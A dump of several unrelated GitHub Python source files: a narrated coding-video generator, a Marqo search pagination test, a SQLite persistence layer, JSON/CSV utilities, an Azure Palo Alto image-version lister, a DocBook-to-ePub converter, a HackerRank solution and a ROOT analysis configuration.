`BrowserInteraction`, and `ProcessManagement` to record video segments and assemble
them into a final video.
Usage:
To create and execute a sequence of video commands, initialize an instance of
the `VideoInvoker` class and use its methods. This class works with command objects
that encapsulate specific actions and parameters.
Example:
```python
invoker = VideoInvoker()
# Create command objects
animation_generator = CodeAnimationGenerator(text_mapping, INTRO_CODE, OUTRO_CODE)
start_subshell = StartSubshell("server_subshell")
run_server = ExecuteSubshellCommand("server_subshell", "python3.11 test_server.py &")
browser_interaction = BrowserInteraction("http://localhost:5000/", "Webpage narration")
kill_subshell = TerminateSubshell("server_subshell")
# Execute command objects
invoker.execute_command(animation_generator)
invoker.execute_command(start_subshell)
invoker.execute_command(run_server)
invoker.execute_command(browser_interaction)
invoker.execute_command(kill_subshell)
FINAL_VIDEO_NAME = "final_video.mp4"
invoker.dump_file(FINAL_VIDEO_NAME)
```
Author:
Roman Parise
"""
# Project imports
from .video_receiver import VideoReceiver
from .command import Command, CreateClipCommand
from .code_animation_generator import CodeAnimationGenerator
from .browser_interaction import BrowserInteraction
from .process_management import StartSubshell, ExecuteSubshellCommand, TerminateSubshell
class VideoInvoker:
    """
    Invoker of the Command pattern for video generation: runs command
    objects against a shared VideoReceiver and writes the final movie.
    """

    def __init__(self):
        """
        Create the invoker with a fresh VideoReceiver.
        """
        self.video_receiver = VideoReceiver()

    def execute_command(self, command: Command):
        """
        Execute *command*, first wiring clip-producing commands to the
        shared receiver so their output lands in the final movie.

        Args:
            command (Command): The command to execute.
        """
        if isinstance(command, CreateClipCommand):
            command.set_receiver(self.video_receiver)
        command.execute()

    def dump_file(self, output_filename: str = "output.mp4"):
        """
        Save the assembled movie to *output_filename* (mp4).

        Args:
            output_filename (str): The name of the output video file.
        """
        self.video_receiver.dump_file(output_filename)
if __name__ == "__main__":
    # Demo: record a short tutorial that writes a minimal Flask server in
    # vim, runs it in a subshell, shows the page in a browser, then cleans up.
    invoker = VideoInvoker()
    # Write Flask server: each entry pairs narration audio with the
    # keystrokes to type (vim commands + code).
    text_mapping = [
        {
            "narration_text": "First, we're going to make the necessary imports.",
            "code_text": """
vim test_server.py
ifrom flask import Flask
""",
        },
        {
            "narration_text": "Then, we're going to instantiate our webapp and create a route.",
            "code_text": """
app = Flask(__name__)
@app.route("/")
def hello():
    return "Hello World!"
""",
        },
        {
            "narration_text": "Finally, we'll run the app.",
            "code_text": """
if __name__ == '__main__':
    app.run()
""",
        },
        {
            "narration_text": "We're now going to run the server.",
            "code_text": """
<Escape>
:x
""",
        },
    ]
    # Shell snippets executed before/after the animation to reset state.
    INTRO_CODE = "rm -rf test_server.py; clear"
    OUTRO_CODE = "rm -rf test_server.py; clear"
    # Initialize the CodeAnimationGenerator
    animation_generator = CodeAnimationGenerator(text_mapping, INTRO_CODE, OUTRO_CODE)
    invoker.execute_command(animation_generator)
    # Start subshell for server
    start_subshell = StartSubshell("server_subshell")
    invoker.execute_command(start_subshell)
    # Run server in subshell (backgrounded so the demo can continue)
    run_server = ExecuteSubshellCommand(
        "server_subshell", "python3.11 test_server.py &"
    )
    invoker.execute_command(run_server)
    # Test the BrowserInteraction class
    browser_interaction = BrowserInteraction(
        "http://localhost:5000/",
        "As you can see, the webpage is rendered as expected.",
    )
    invoker.execute_command(browser_interaction)
    # Kill subshell
    kill_subshell = TerminateSubshell("server_subshell")
    invoker.execute_command(kill_subshell)
    FINAL_VIDEO_NAME = "final_video.mp4"
    invoker.dump_file(FINAL_VIDEO_NAME)
    print(f"Animation video saved to {FINAL_VIDEO_NAME}")
| thejackal360/tutgen | tutgen/video_invoker.py | video_invoker.py | py | 4,840 | python | en | code | 0 | github-code | 36 |
30338835101 | import marqo
import pprint
import requests
import random
import math
# Test bug in pagination feature of OpenSearch:
# index 100 random documents, fetch them all in one query, then fetch them
# page by page and report any discrepancy between the two orderings.

# Create marqo index
mq = marqo.Client(url='http://localhost:8882')

# Drop any stale index left over from a previous run; ignore "index does
# not exist" errors. Fix: was a bare `except:`, which would also swallow
# KeyboardInterrupt/SystemExit.
try:
    mq.index("my-first-index").delete()
except Exception:
    pass

# Index set number of documents: 100 docs of 25 random words each,
# seeded so the corpus is reproducible across runs.
mq.create_index("my-first-index")
vocab_source = "https://www.mit.edu/~ecprice/wordlist.10000"
vocab = requests.get(vocab_source).text.splitlines()

num_docs = 100
random.seed(2020)
docs = [{"Title": "a " + (" ".join(random.choices(population=vocab, k=25))),
         "_id": str(i)
         }
        for i in range(num_docs)]
mq.index("my-first-index").add_documents(
    docs, auto_refresh=False
)
mq.index("my-first-index").refresh()

search_method = "TENSOR"

# Search for all 100 documents at the same time; this full result list is
# the reference ordering the paginated queries are compared against.
debug_res = mq.index("my-first-index").search(
    search_method=search_method,
    q='a',
    limit=num_docs)
debug_res_id_only = [hit["_id"] for hit in debug_res["hits"]]

# Search for pages of 1 document at a time
for page_size in [1]:
    print("========================================================")
    print(f"{search_method}: Results for page_size = {page_size}")
    paginated_search_results = {"hits": []}
    for page_num in range(math.ceil(num_docs / page_size)):
        lim = page_size
        off = page_num * page_size
        # print(f"Now testing: limit={lim}, offset={off}")
        page_res = mq.index("my-first-index").search(
            search_method=search_method,
            q='a',
            limit=lim, offset=off)
        single_page_id_only = [hit["_id"] for hit in page_res["hits"]]
        paginated_search_results["hits"].extend(page_res["hits"])
        print("========================================================")
        print(f"Query for page num {page_num}")
        print(f"size: {page_res['limit']}, from: {page_res['offset']}")
        # The page must equal the corresponding slice of the full result.
        expected_res = debug_res_id_only[off:off+lim]
        print(f"Paginated result for page num {page_num}: {single_page_id_only}")
        print(f"Expected result for page num {page_num}: {expected_res}")
        if expected_res != single_page_id_only:
            print("DISCREPANCY FOUND.")
    page_id_only = [hit["_id"] for hit in paginated_search_results["hits"]]
    print("========================================================")
    print(f"FULL RESULTS: (length = {len(debug_res['hits'])})")
    print(debug_res_id_only)
    print(f"PAGINATED: (length = {len(paginated_search_results['hits'])})")
    print(page_id_only)
    print("Paginated results same as expected full results?")
    print(debug_res["hits"] == paginated_search_results["hits"])
# Public API of this module.
__all__ = (
    'Persistor',
    'SQLPersistor',
    'SQLitePersistor',
)

# sqlite3 is treated as an optional dependency: when the import fails,
# SQLitePersistor._connect raises RuntimeError at use time instead.
try:
    import sqlite3
except Exception:
    sqlite3 = None
class Persistor(object):
    """
    Abstract base for persistence strategies (a `Model` instance delegates
    its `persist` call to one of these).
    """

    def persist(self, attributes):
        """
        Persist the specified `attributes`

        Args:
            attributes (dict): the attributes

        Returns:
            bool: the result

        Raises:
            NotImplementedError: always, unless overridden by an
                inheriting class
        """
        raise NotImplementedError
class SQLPersistor(Persistor):
    """
    Class providing methods for persisting input to a SQL DB (persistence occurs
    when the `persist` method is called on a `Model` instance)

    Instance Attributes:
        table_name (str): the table name
        key_attribute_names (set of str): the key-attribute names (in the future
            complex keys will likely be supported, for now only simple/singular
            keys are supported)

    NOTE(review): SQL statements are built via string interpolation. Values
    are quoted and embedded single-quotes are now escaped (see
    `_column_value`), but parameterized queries would be the robust
    long-term fix for untrusted input.
    """

    def __init__(
        self,
        table_name,
        key_attribute_name=None,
    ):
        self.table_name = table_name
        # Stored as a (possibly empty) frozenset to keep room for complex
        # keys later without changing the attribute's type.
        self.key_attribute_names = frozenset([key_attribute_name]) if \
            key_attribute_name else frozenset()

    @property
    def connection(self):
        """
        Lazy-load and return the "Connection" instance

        Returns:
            mixed: the instantiated/connected "Connection" instance

        Raises:
            NotImplementedError: if the `_connect` method is not overridden by
                an inheriting class
        """
        if not hasattr(self, '_connection'):
            self._connection = self._connect()
        return self._connection

    def persist(self, attributes):
        """
        Persist the specified `attributes`

        Args:
            attributes (dict): the attributes

        Returns:
            mixed: the mapped INSERT/UPDATE result

        Raises:
            RuntimeError: if a dependency could not be loaded or a connection to
                DB could not be established
        """
        key_attributes, non_key_attributes = \
            self._partition_attributes(attributes)
        # UPDATE only when every key attribute has a truthy value;
        # otherwise this is a brand-new row and we INSERT.
        if key_attributes and all(key_attributes.values()):
            return self._update(key_attributes, non_key_attributes)
        return self._insert(non_key_attributes)

    def _column_name(self, attribute_name):
        """
        Convert an attribute-name to a column-name (snake_case -> CamelCase)

        Args:
            attribute_name (str): the attribute-name

        Returns:
            str: the column-name
        """
        return ''.join(
            str.capitalize(attribute_name_part)
            for attribute_name_part in attribute_name.split('_')
        )

    def _column_value(self, attribute_value):
        """
        Sanitize and quote an attribute-value

        Args:
            attribute_value (mixed): the attribute-value

        Returns:
            str: the sanitized and quoted attribute-value (or "NULL")
        """
        if attribute_value is None:
            return 'NULL'
        # Bug fix: escape embedded single-quotes by doubling them, so a
        # value such as "O'Brien" cannot terminate the SQL string literal
        # early (previously produced broken/injectable SQL).
        return "'%s'" % str(attribute_value).replace("'", "''")

    def _connect(self):
        """
        Establish a new connection to a DB

        Returns:
            mixed: the new connection instance

        Raises:
            NotImplementedError: if this method is not overridden by an
                inheriting class
        """
        raise NotImplementedError

    def _insert(self, non_key_attributes):
        """
        Perform an INSERT operation based on the specified `non_key_attributes`

        Args:
            non_key_attributes (dict): the non-key-attributes

        Returns:
            mixed: the mapped INSERT result
        """
        return self._map_insert_result(self.connection.execute(self._insert_sql(
            non_key_attributes)))

    def _insert_sql(self, non_key_attributes):
        """
        Generate the SQL required for an INSERT operation based on the specified
        `non_key_attributes`

        Args:
            non_key_attributes (dict): the non-key-attributes

        Returns:
            str: the SQL string
        """
        return 'INSERT INTO %s (%s) VALUES (%s)' % (
            self.table_name,
            ', '.join(
                self._column_name(attribute_name)
                for attribute_name in non_key_attributes.keys()
            ),
            ', '.join(
                self._column_value(attribute_value)
                for attribute_value in non_key_attributes.values()
            ),
        )

    def _map_insert_result(self, result):
        """
        Map the result from an INSERT operation

        Args:
            result (mixed): the unmapped INSERT result

        Returns:
            mixed: the mapped INSERT result
        """
        return result

    def _map_update_result(self, result):
        """
        Map the result from an UPDATE operation

        Args:
            result (mixed): the unmapped UPDATE result

        Returns:
            mixed: the mapped UPDATE result
        """
        return result

    def _partition_attributes(self, attributes):
        """
        Partition the specified `attributes` into two `dict(s)`, one of the
        `key_attributes` and another of the `non_key_attributes`

        Args:
            attributes (dict): the attributes

        Returns:
            tuple (of dicts): a `tuple` of the `key_attributes` and
                `non_key_attributes`
        """
        key_attributes, non_key_attributes = {}, {}
        key_attribute_names = self.key_attribute_names
        for attribute_name, attribute_value in attributes.items():
            if attribute_name in key_attribute_names:
                key_attributes[attribute_name] = attribute_value
            else:
                non_key_attributes[attribute_name] = attribute_value
        return (key_attributes, non_key_attributes)

    def _update(
        self,
        key_attributes,
        non_key_attributes
    ):
        """
        Perform an UPDATE operation based on the specified `key_attributes` and
        `non_key_attributes`

        Args:
            key_attributes (dict): the key-attributes
            non_key_attributes (dict): the non-key-attributes

        Returns:
            mixed: the mapped UPDATE result
        """
        return self._map_update_result(self.connection.execute(self._update_sql(
            key_attributes, non_key_attributes)))

    def _update_sql(
        self,
        key_attributes,
        non_key_attributes
    ):
        """
        Generate the SQL required for an UPDATE operation based on the specified
        `key_attributes` and `non_key_attributes`

        Args:
            key_attributes (dict): the key-attributes
            non_key_attributes (dict): the non-key-attributes

        Returns:
            str: the SQL string
        """
        return 'UPDATE %s SET %s WHERE %s' % (
            self.table_name,
            ', '.join(
                '%s = %s' % (self._column_name(attribute_name),
                             self._column_value(attribute_value))
                for attribute_name, attribute_value in
                non_key_attributes.items()
            ),
            ' AND '.join(
                '%s = %s' % (self._column_name(attribute_name),
                             self._column_value(attribute_value))
                for attribute_name, attribute_value in
                key_attributes.items()
            )
        )
class SQLitePersistor(SQLPersistor):
    """
    Class providing methods for persisting input to a SQLite DB (persistence
    occurs when the `persist` method is called on a `Model` instance)

    Instance Attributes:
        database_file_path (str): the database file-path
        table_name (str): the table name
        key_attribute_names (set of str): the key-attribute names (in the future
            complex keys will likely be supported, for now only simple/singular
            keys are supported)
    """

    def __init__(
        self,
        database_file_path,
        table_name,
        key_attribute_name=None
    ):
        super(SQLitePersistor, self).__init__(table_name, key_attribute_name)
        self.database_file_path = database_file_path

    def _connect(self):
        """
        Establish a new connection to a SQLite DB

        Returns:
            sqlite3.Connection: the new connection instance

        Raises:
            RuntimeError: if the `sqlite3` library was not successfully loaded
        """
        # `sqlite3` is imported at module scope inside try/except and is
        # None when the import failed.
        if sqlite3 is None:
            raise RuntimeError
        return sqlite3.connect(self.database_file_path)

    def _map_insert_result(self, result):
        """
        Map the result from an INSERT operation

        Args:
            result (mixed): the unmapped INSERT result (a sqlite3 cursor)

        Returns:
            dict: the single key-attribute name mapped to the new row-id

        Raises:
            StopIteration: if no key_attribute_name was configured (the
                frozenset is empty) -- NOTE(review): confirm callers always
                supply one.
        """
        return {next(iter(self.key_attribute_names)): result.lastrowid}

    def _map_update_result(self, result):
        """
        Map the result from an UPDATE operation

        Args:
            result (mixed): the unmapped UPDATE result (a sqlite3 cursor)

        Returns:
            dict: the single key-attribute name mapped to `Cursor.lastrowid`

        NOTE(review): per the sqlite3 docs, `Cursor.lastrowid` is only set
        by INSERT statements; after an UPDATE it is stale/None -- confirm
        whether callers rely on this value.
        """
        return {next(iter(self.key_attribute_names)): result.lastrowid}
| jzaleski/formulaic | formulaic/persistors.py | persistors.py | py | 9,411 | python | en | code | 1 | github-code | 36 |
13535976062 | import csv
import json
from collections import OrderedDict
def import_jsonfile_as_OrderedDict(json_filepath):
    """Load the JSON file at *json_filepath*, preserving key order.

    Returns:
        OrderedDict: the parsed document (nested objects are OrderedDicts too).
    """
    # Bug fix: use a context manager so the file handle is always closed
    # (the original leaked the handle returned by open()).
    with open(json_filepath, "r") as f:
        return json.loads(f.read(), object_pairs_hook = OrderedDict)
def export_dict_to_jsonfile(dic, json_filepath, indent = 2, separators=(',', ': ')):
    """Serialize *dic* as pretty-printed JSON into *json_filepath*."""
    with open(json_filepath, "w") as outfile:
        outfile.write(json.dumps(dic, indent = indent, separators = separators))
def get_entries_in_csv_col(csv_filepath, col_name, delimiter = ','):
    """Return the entries (as strings) of the column headed *col_name*.

    Args:
        csv_filepath (str): path to the CSV file; first row is the header.
        col_name (str): header of the column to extract (first match wins).
        delimiter (str): CSV field delimiter.

    Returns:
        list of str: the column entries, top to bottom ([] for an empty file).

    Raises:
        ValueError: if the header row does not contain *col_name*
            (the original silently fell back to column 0).
    """
    with open(csv_filepath) as csv_file:
        csv_reader = csv.reader(csv_file, delimiter = delimiter)
        try:
            header = next(csv_reader)
        except StopIteration:
            return []  # empty file -> no entries
        try:
            col_idx = header.index(col_name)
        except ValueError:
            raise ValueError(
                "column %r not found in %s" % (col_name, csv_filepath))
        return [row[col_idx] for row in csv_reader]
| tyjyang/CampaignManager | lib/io_tools.py | io_tools.py | py | 944 | python | en | code | 0 | github-code | 36 |
17848204772 | #! /usr/bin/env python3
import os
import re

from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient

# Variables
subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID")
location = "eastus"
publisher_name = "PaloAltoNetworks"

# Acquire a credential object
token_credential = DefaultAzureCredential()

# Acquire a compute client
compute_client = ComputeManagementClient(token_credential, subscription_id)


def list_versions(offer, sku, v9_first=False):
    """Return the image version names published for *offer*/*sku*.

    Args:
        offer (str): marketplace offer name (e.g. "vmseries-flex").
        sku (str): SKU within the offer (e.g. "byol").
        v9_first (bool): when True, list 9.x versions ahead of the rest
            (the ordering previously produced for flex/panorama SKUs).

    Returns:
        list of str: version names in API order, optionally 9.x first.
    """
    images = compute_client.virtual_machine_images.list(
        location, publisher_name, offer, sku
    )
    names = [image.name for image in images]
    if not v9_first:
        return names
    # startswith() also tolerates empty names, unlike name[0] indexing.
    return ([n for n in names if n.startswith("9")]
            + [n for n in names if not n.startswith("9")])


def md_versions(versions):
    """Render version names as back-quoted, space-separated markdown."""
    return "".join("`" + v + "` " for v in versions)


# Gather version numbers per offer and per sku
# (previously eight copy-pasted listing loops; now one helper call each).
fixed_bnd1 = list_versions("vmseries1", "bundle1")  # Fixed CPU
fixed_bnd2 = list_versions("vmseries1", "bundle2")
fixed_byol = list_versions("vmseries1", "byol")

flex_bnd1 = list_versions("vmseries-flex", "bundle1", v9_first=True)  # Flex
flex_bnd2 = list_versions("vmseries-flex", "bundle2", v9_first=True)
flex_bnd3 = list_versions("vmseries-flex", "bundle3", v9_first=True)
flex_byol = list_versions("vmseries-flex", "byol", v9_first=True)

panorama = list_versions("panorama", "byol", v9_first=True)  # Panorama

# Output in markdown format
result = "\n# Azure\n"
result += "\n## Flexible CPU (Offer: `vmseries-flex`)\n"
result += "\n### BYOL (SKU: `byol`)\n"
result += md_versions(flex_byol)
result += "\n### PAYG Bundle 1 (SKU: `bundle1`)\n"
result += md_versions(flex_bnd1)
result += "\n### PAYG Bundle 2 (SKU: `bundle2`)\n"
result += md_versions(flex_bnd2)
result += "\n### PAYG Bundle 3 (SKU: `bundle3`)\n"
result += md_versions(flex_bnd3)
result += "\n## Fixed CPU (Offer: `vmseries1`)\n"
result += "\n### BYOL (SKU: `byol`)\n"
result += md_versions(fixed_byol)
result += "\n### PAYG Bundle 1 (SKU: `bundle1`)\n"
result += md_versions(fixed_bnd1)
result += "\n### PAYG Bundle 2 (SKU: `bundle2`)\n"
result += md_versions(fixed_bnd2)
result += "\n"
result += "\n## Panorama (Offer: `panorama`, SKU: `byol`)\n"
result += md_versions(panorama)

print(result)
6742324568 | # -*- coding: utf-8 -*-
# file docbook2epub.py
# This file is part of LyX, the document processor.
# Licence details can be found in the file COPYING.
#
# \author Thibaut Cuvelier
#
# Full author contact details are available in file CREDITS
# Usage:
# python docbook2epub.py java_binary saxon_path xsltproc_path xslt_path in.docbook in.orig.path out.epub
from __future__ import print_function
import glob
import os
import shutil
import sys
import tempfile
import zipfile
from io import open # Required for Python 2.
def _parse_nullable_argument(arg):
return arg if arg != '' and arg != 'none' else None
class ImageRename:
    """Record of one image's three locations: its href in package.opf,
    its path on the local file system, and its target path inside the ePub."""
    def __init__(self, opf_path, local_path, epub_path):
        self.opf_path = opf_path
        self.local_path = local_path
        self.epub_path = epub_path
class DocBookToEpub:
    """Drive the DocBook -> ePub 3 conversion: run the XSLT chunking
    style sheet, relocate referenced images, and zip the staging
    directory into the final .epub."""

    def __init__(self, args=None):
        """Parse the seven positional arguments (program name first) and
        precompute the paths used by the later stages.

        Args:
            args: argv-style list; defaults to sys.argv.
        """
        if args is None:
            args = sys.argv
        if len(args) != 8:
            print('Exactly eight arguments are expected, only %s found: %s.' % (len(args), args))
            sys.exit(1)

        # Bug fix: read from the validated `args` parameter instead of
        # sys.argv, so a caller-supplied argument list is actually honoured.
        self.own_path = args[0]
        self.java_path = _parse_nullable_argument(args[1])
        self.saxon_path = _parse_nullable_argument(args[2])
        self.xsltproc_path = _parse_nullable_argument(args[3])
        self.xslt_path = _parse_nullable_argument(args[4])
        self.input = args[5]
        self.input_path = args[6]
        self.output = args[7]
        self.script_folder = os.path.dirname(self.own_path) + '/../'

        print('Generating ePub with the following parameters:')
        print(self.own_path)
        print(self.java_path)
        print(self.saxon_path)
        print(self.xsltproc_path)
        print(self.xslt_path)
        print(self.input)
        print(self.input_path)
        print(self.output)

        # Precompute paths that will be used later.
        self.output_dir = tempfile.mkdtemp().replace('\\', '/')
        self.package_opf = self.output_dir + '/OEBPS/package.opf'  # Does not exist yet,
        print('Temporary output directory: %s' % self.output_dir)

        # Fall back to the style sheets shipped alongside this script.
        if self.xslt_path is None:
            self.xslt = self.script_folder + 'docbook/epub3/chunk.xsl'
        else:
            self.xslt = self.xslt_path + '/epub3/chunk.xsl'
        print('XSLT style sheet to use:')
        print(self.xslt)

        if self.saxon_path is None:
            self.saxon_path = self.script_folder + 'scripts/saxon6.5.5.jar'

        # These will be filled during the execution of the script.
        self.renamed = None

    def gracefully_fail(self, reason):
        """Report *reason*, remove the temporary directory, and exit(1)."""
        print('docbook2epub fails: %s' % reason)
        shutil.rmtree(self.output_dir, ignore_errors=True)
        sys.exit(1)

    def start_xslt_transformation(self):
        """Run the chunking style sheet with xsltproc (preferred) or
        Java/Saxon 6; abort via gracefully_fail on any error."""
        command = None
        if self.xsltproc_path is not None:
            command = self.start_xslt_transformation_xsltproc()
        elif self.java_path is not None:
            command = self.start_xslt_transformation_saxon6()
        if command is None:
            self.gracefully_fail('no XSLT processor available')

        print('Command to execute:')
        print(command)

        quoted_command = command
        if os.name == 'nt':
            # On Windows, it is typical to have spaces in folder names, and that requires to wrap the whole command
            # in quotes. On Linux, this might create errors when starting the command.
            quoted_command = '"' + command + '"'

        # This could be simplified by using subprocess.run, but this requires Python 3.5.
        if os.system(quoted_command) != 0:
            self.gracefully_fail('error from the XSLT processor')
        print('Generated ePub contents.')

    def start_xslt_transformation_xsltproc(self):
        """Build the xsltproc command line."""
        params = '-stringparam base.dir "' + self.output_dir + '"'
        return '"' + self.xsltproc_path + '" ' + params + ' "' + self.xslt + '" "' + self.input + '"'

    def start_xslt_transformation_saxon6(self):
        """Build the Java/Saxon 6 command line."""
        params = 'base.dir=%s' % self.output_dir
        executable = '"' + self.java_path + '" -jar "' + self.saxon_path + '"'
        return executable + ' "' + self.input + '" "' + self.xslt + '" "' + params + '"'

    def get_images_from_package_opf(self):
        """Return the image hrefs declared as <item> entries in package.opf."""
        images = []
        # Example in the OPF file:
        #     <item id="d436e1" href="D:/LyX/lib/images/buffer-view.svgz" media-type="image/SVGZ"/>
        # The XHTML files are also <item> tags:
        #     <item id="id-d0e2" href="index.xhtml" media-type="application/xhtml+xml"/>
        try:
            with open(self.package_opf, 'r') as f:
                for line in f.readlines():
                    if '<item' in line and 'media-type="image' in line:
                        images.append(line.split('href="')[1].split('"')[0])
        except FileNotFoundError:
            print('The package.opf file was not found, probably due to a DocBook error. The ePub file will be corrupt.')
        return images

    def get_image_changes(self):
        """Map each OPF image href to its on-disk source path and its
        target path inside the ePub (OEBPS/images/<basename>)."""
        epub_folder = 'images/'
        changes = []
        for image in self.get_images_from_package_opf():
            # Try the href as-is, then relative to the original input.
            if os.path.exists(image):
                file_system_path = image
            elif os.path.exists(self.input_path + image):
                file_system_path = self.input_path + image
            else:
                # NOTE(review): an unresolved image keeps an empty source
                # path here; copy_images will then fail on copyfile --
                # confirm whether missing assets should be skipped instead.
                file_system_path = ''
            changes.append(ImageRename(image, file_system_path, epub_folder + os.path.basename(image)))
        return changes

    def change_image_paths(self, file):
        """Rewrite every renamed image path inside *file*, in place."""
        # This could be optimised, as the same operation is performed a zillion times on many files:
        # https://www.oreilly.com/library/view/python-cookbook/0596001673/ch03s15.html
        with open(file, 'r', encoding='utf8') as f:
            contents = list(f)
        with open(file, 'w', encoding='utf8') as f:
            for line in contents:
                for change in self.renamed:
                    line = line.replace(change.opf_path, change.epub_path)
                f.write(line)

    def copy_images(self):
        """Copy referenced images into OEBPS/images/ and patch every
        reference in the OPF and XHTML files."""
        # Copy the assets to the OEBPS/images/. All paths are available in OEBPS/package.opf, but they must also be
        # changed in the XHTML files. Typically, the current paths are absolute.
        # First, get the mapping old file => file in the ePub archive.
        self.renamed = self.get_image_changes()

        # Then, transform all paths (both OPF and XHTML files).
        self.change_image_paths(self.output_dir + '/OEBPS/package.opf')
        for file in glob.glob(self.output_dir + '/OEBPS/*.xhtml'):
            self.change_image_paths(file)

        # Ensure that the destination path exists. OEBPS exists due to the DocBook-to-ePub transformation.
        if not os.path.exists(self.output_dir + '/OEBPS/images/'):
            os.mkdir(self.output_dir + '/OEBPS/images/')

        # Finally, actually copy the image files.
        for change in self.renamed:
            shutil.copyfile(change.local_path, self.output_dir + '/OEBPS/' + change.epub_path)

    def create_zip_archive(self):
        """Zip the staging directory into the final .epub, then delete it."""
        with zipfile.ZipFile(self.output, 'w', zipfile.ZIP_DEFLATED) as zip:
            # Python 3.5 brings the `recursive` argument. For older versions, this trick is required...
            # for file in glob.glob(output_dir + '/**/*', recursive=True):
            # Note: the per-member compress_type=ZIP_STORED overrides the
            # archive-level ZIP_DEFLATED, i.e. members are stored uncompressed.
            for file in [os.path.join(dp, f) for dp, dn, filenames in os.walk(self.output_dir) for f in filenames]:
                zip.write(file, os.path.relpath(file, self.output_dir), compress_type=zipfile.ZIP_STORED)
        shutil.rmtree(self.output_dir)
        print('Generated ePub.')

    def transform(self):
        """Run the full pipeline: XSLT transform, image relocation, zipping."""
        self.start_xslt_transformation()
        self.copy_images()
        self.create_zip_archive()
if __name__ == '__main__':
    # Entry point: the argv list is validated and parsed inside __init__.
    DocBookToEpub(sys.argv).transform()
| cburschka/lyx | lib/scripts/docbook2epub.py | docbook2epub.py | py | 7,833 | python | en | code | 33 | github-code | 36 |
74160112423 | #!/bin/python3
import sys
def icecreamParlor(m, arr):
    """Return the 1-based indices [i, j] (i < j) of the two flavors in
    *arr* whose prices sum to *m*.

    Replaces the original O(n^2) all-pairs scan with a single-pass
    value->index map (O(n)). Assumes, as the problem statement
    guarantees, that at most one such pair exists; returns [] when none.
    """
    seen = {}  # price -> earliest 1-based index where it occurs
    for j, price in enumerate(arr, start=1):
        complement = m - price
        if complement in seen:
            return [seen[complement], j]
        # Keep only the first occurrence so i is as small as possible.
        if price not in seen:
            seen[price] = j
    return []
if __name__ == "__main__":
    # One query per test case: target amount m, flavor count n, then the
    # space-separated price list.
    t = int(input().strip())
    for a0 in range(t):
        m = int(input().strip())
        n = int(input().strip())
        arr = list(map(int, input().strip().split(' ')))
        result = icecreamParlor(m, arr)
        # Print the two 1-based flavor indices separated by a space.
        print (" ".join(map(str, result)))
26741108051 | import ROOT
from xAH_config import xAH_config
import sys, os
# Make the user scripts shipped with the analysis package importable.
sys.path.insert(0, os.environ['ROOTCOREBIN']+"/user_scripts/HTopMultilepAnalysis/")

c = xAH_config()

# Event-level and per-lepton branches to keep active in the input ntuple.
event_branches = ["EventNumber","RunNumber","mc_channel_number","isSS01","dilep_type","trilep_type",
                  "is_T_T","is_T_AntiT","is_AntiT_T","is_AntiT_AntiT",
                  "is_TMVA_TMVA","is_TMVA_AntiTMVA","is_AntiTMVA_TMVA","is_AntiTMVA_AntiTMVA",
                  "nJets_OR_T","nJets_OR_T_MV2c10_70",
                  ]

lep_branches = ["lep_ID_0","lep_Pt_0","lep_Eta_0","lep_Phi_0","lep_EtaBE2_0","lep_deltaRClosestJet_0","lep_isTightSelected_0","lep_isTightSelectedMVA_0","lep_isTrigMatch_0",
                "lep_ID_1","lep_Pt_1","lep_Eta_1","lep_Phi_1","lep_EtaBE2_1","lep_deltaRClosestJet_1","lep_isTightSelected_1","lep_isTightSelectedMVA_1","lep_isTrigMatch_1"]

branches_to_activate = event_branches + lep_branches

# Trick to pass the list as a comma-separated string to the C++ algorithm
branches_to_activate_str = ",".join(branches_to_activate)
# Instantiate the main algorithm
base_dir = "/imports/home/mmilesi/PhD/ttH_MultiLeptons/RUN2/HTopMultilepAnalysisCode/trunk/"
#base_dir = "/afs/cern.ch/user/m/mmilesi/ttH/RUN2/HTopMultilepAnalysisCode/trunk"

# Configuration handed to the C++ HTopMultilepNTupReprocesser algorithm.
# Commented-out entries are preserved alternatives for other ntuple
# versions / parametrisations.
HTopMultilepNTupReprocesserDict = { "m_name"                 : "HTopMultilepNTupReprocesser",
                                    "m_debug"                : False,
                                    "m_verbose"              : False,
                                    "m_outputNTupStreamName" : "output",
                                    "m_inputBranches"        : branches_to_activate_str,
                                    # "m_weightToCalc"       : "QMisID,MM",
                                    "m_weightToCalc"         : "MM",
                                    # "m_weightToCalc"       : "QMisID",
                                    "m_QMisIDRates_dir"      : "$ROOTCOREBIN/data/HTopMultilepAnalysis/External/",
                                    "m_QMisIDRates_Filename_T"     : "Rates_v29_Tight.root",
                                    "m_QMisIDRates_Filename_AntiT" : "Rates_v29_AntiTight.root",
                                    # "m_QMisIDRates_Filename_T"     : "Rates_v27_For3l.root",
                                    # "m_QMisIDRates_Filename_AntiT" : "Rates_v27_For3l_AntiT.root",
                                    # "m_QMisIDRates_Filename_T"     : "Rates_Data_3l_2D_tight.root",
                                    # "m_QMisIDRates_Filename_AntiT" : "Rates_Data_3l_2D_Loose.root",
                                    "m_QMisIDRates_Histname_T"     : "LikelihoodEtaPtTight",
                                    "m_QMisIDRates_Histname_AntiT" : "LikelihoodEtaPtLoose",
                                    # "m_QMisIDRates_Histname_T"     : "LikelihoodEtaPt",
                                    # "m_QMisIDRates_Histname_AntiT" : "LikelihoodEtaPt",
                                    "m_useTAntiTRates"             : False, # --> set this option to True if QMisID rates have NOT been measured independently for T and AntiT electrons - Set True for v19
                                    #
                                    # ------------------------------------------------------------
                                    #
                                    # v26
                                    #
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonMVA_410501",
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonMVA_410000",
                                    #
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonCutBased_410501",
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/CombinedEfficiencies_LeptonCutBased_410000",
                                    #"m_useCutBasedLep" : True,
                                    #
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v26/MMRates_DATA/OutputPlots_MMRates_25ns_v26_LeptonMVA_DDQMisID",
                                    #"m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/OutputPlots_MMClosureRates_25ns_v26_LeptonMVA", # Closure
                                    #
                                    # ------------------------------------------------------------
                                    #
                                    # v27
                                    #
